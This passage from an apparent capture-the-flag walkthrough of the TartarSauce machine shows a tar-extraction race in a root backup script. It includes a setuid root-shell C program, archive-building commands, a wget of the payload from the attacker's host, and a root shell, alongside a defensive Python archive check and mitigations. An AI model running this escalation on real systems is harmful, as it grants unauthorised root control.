9 privesc onuma > root
# pspy shows
2021/09/22 17:09:31 CMD: UID=0 PID=5730 | /bin/bash /usr/sbin/backuperer
# looking at the script
We can see that the script does – more or less – the following:
1. Removes dot files from /var/tmp, plus the /var/tmp/check folder.
2. Zips/archives the contents of /var/www/html as user onuma into a file in /var/tmp with a random name beginning with a dot.
3. Sleeps for 30 seconds.
4. Creates the directory /var/tmp/check.
5. Extracts the previously archived contents as root into the /var/tmp/check directory.
6. Performs a diff of /var/www/html against /var/tmp/check/var/www/html.
7. If the check in step 6 reports differences, it only writes an error log and leaves the files in place. If no differences are reported, or if the diff command errors out (for example because the directory doesn't exist), it moves the archive file into /var/backups and then removes the /var/tmp/check directory and the dot file.
The weakness is the window in step 3: /var/tmp is world-writable and the archive is owned by onuma, so during the 30-second sleep we can replace the gzipped tar with our own. If that archive contains an executable owned by root with the setuid bit set, and keeps the var/www/html directory structure intact (so the diff in step 6 runs without error but reports differences), then root's tar extracts it with owner and permissions preserved and the script leaves everything in /var/tmp/check untouched. We can then enter the check directory and run our file to get a root shell.
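From the defender's side, the step the backuperer script is missing is a look at the archive before root extracts it. The following is an added example, not code from this writeup or from the box's backuperer script: a Python check that opens the gzipped tar and flags exactly the properties the race relies on (setuid/setgid bits, members not owned by the expected unprivileged uid, links, path traversal, and files outside the backed-up tree). The function and helper names, the two in-memory archives, and the expected uid 1000 (onuma's, from the id output on this page) are assumptions for the example.

```python
import io
import stat
import tarfile

# Added example (not from the original writeup): an archive-inspection step a
# backup job could run before extracting as root. It returns findings instead
# of raising so a caller can log them and refuse the extraction.

def archive_findings(archive_bytes, expected_uid=1000, tree="var/www/html"):
    """Return a list of (finding, member_name) tuples for a gzipped tar held
    in memory; an empty list means nothing the backup job should refuse."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tf:
        for m in tf.getmembers():
            parts = m.name.split("/")
            if m.name.startswith("/") or ".." in parts:
                findings.append(("path-traversal", m.name))
            # Setuid/setgid are the bits root's tar restores and the race abuses.
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append(("setuid-or-setgid", m.name))
            # The archive is supposed to be produced by the unprivileged user.
            if m.uid != expected_uid:
                findings.append(("unexpected-owner", m.name))
            if m.issym() or m.islnk():
                findings.append(("link", m.name))
            # Anything that is not a directory must live under the backed-up tree.
            if not m.isdir() and not m.name.startswith(tree + "/"):
                findings.append(("outside-tree", m.name))
    return findings


def build_archive(entries):
    """Build a gzipped tar in memory from (name, mode, uid, data) tuples,
    where data is None for a directory. Constructed test input only."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, mode, uid, data in entries:
            ti = tarfile.TarInfo(name)
            ti.mode, ti.uid, ti.gid = mode, uid, uid
            if data is None:
                ti.type = tarfile.DIRTYPE
                tf.addfile(ti)
            else:
                ti.size = len(data)
                tf.addfile(ti, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample: what a legitimate run of the backup produces (uid 1000).
WEB_FILES = [
    ("var", 0o755, 1000, None),
    ("var/www", 0o755, 1000, None),
    ("var/www/html", 0o755, 1000, None),
    ("var/www/html/index.html", 0o644, 1000, b"<html>constructed sample</html>\n"),
]
LEGIT_ARCHIVE = build_archive(WEB_FILES)

# Constructed sample: the swapped-in archive, a root-owned setuid file placed
# inside the same tree so the diff runs and the files are left in place.
SWAPPED_ARCHIVE = build_archive(WEB_FILES[:3] + [
    ("var/www/html/exploit", 0o4755, 0, b"\x7fELF placeholder, not a real binary"),
])

if __name__ == "__main__":
    for label, blob in (("legit", LEGIT_ARCHIVE), ("swapped", SWAPPED_ARCHIVE)):
        print(label, archive_findings(blob) or "clean")
```

The check is a stopgap; the underlying fixes are to stage the archive in a directory only root can write to (not world-writable /var/tmp), and to extract it as the unprivileged user, or at least with GNU tar's `--no-same-owner --no-same-permissions`, so stored ownership and mode bits are never restored by root. Python 3.12's `tarfile.data_filter` applies similar rules at extraction time (strips setuid/setgid bits and refuses traversal), but it does not help a shell script that calls tar directly.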
# exploit.c
#include <unistd.h>
int main()
{
setuid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}
$ gcc -m32 exploit.c -o exploit
# needs to be owned by root: tar stores the owner uid/gid in the archive, and root's tar restores them on extract
$ sudo chown root:root exploit
$ sudo chmod +s exploit
# make the dir structure
$ mkdir -p var/www/html
$ mv exploit var/www/html
$ tar -zcvf exploit.tar.gz var
var/
var/www/
var/www/html/
var/www/html/exploit
# download the archive into /var/tmp, where the .<random> file is created
onuma@TartarSauce:/var/tmp$ wget 10.10.16.5/exploit.tar.gz
onuma@TartarSauce:/var/tmp$ ll
total 2216
drwxrwxrwt 10 root root 4096 Sep 22 17:44 ./
drwxr-xr-x 14 root root 4096 Feb 9 2018 ../
-rw-r--r-- 1 onuma onuma 2224128 Sep 22 17:44 .90e7643302fce3d4b68759541125b78fa0785a29
-rw-r--r-- 1 onuma onuma 2640 Sep 22 17:39 exploit.tar.gz
# rename exploit.tar.gz to the .<random> file name during the 30-second sleep
onuma@TartarSauce:/var/tmp$ mv exploit.tar.gz .90e7643302fce3d4b68759541125b78fa0785a29
# wait until we see the check folder
onuma@TartarSauce:/var/tmp$ ll
total 48
drwxrwxrwt 11 root root 4096 Sep 22 17:44 ./
drwxr-xr-x 14 root root 4096 Feb 9 2018 ../
-rw-r--r-- 1 onuma onuma 2640 Sep 22 17:39 .90e7643302fce3d4b68759541125b78fa0785a29
drwxr-xr-x 3 root root 4096 Sep 22 17:44 check/
# in check/var/www/html/ we have our exploit with the setuid bit preserved
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls -la
total 24
drwxr-xr-x 2 onuma onuma 4096 Sep 22 17:38 .
drwxr-xr-x 3 onuma onuma 4096 Sep 22 17:38 ..
-rwsr-xr-x 1 root root 15100 Sep 22 17:36 exploit
onuma@TartarSauce:/var/tmp/check/var/www/html$ ./exploit
root@TartarSauce:/var/tmp/check/var/www/html# whoami;id;hostname
root
uid=0(root) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
TartarSauce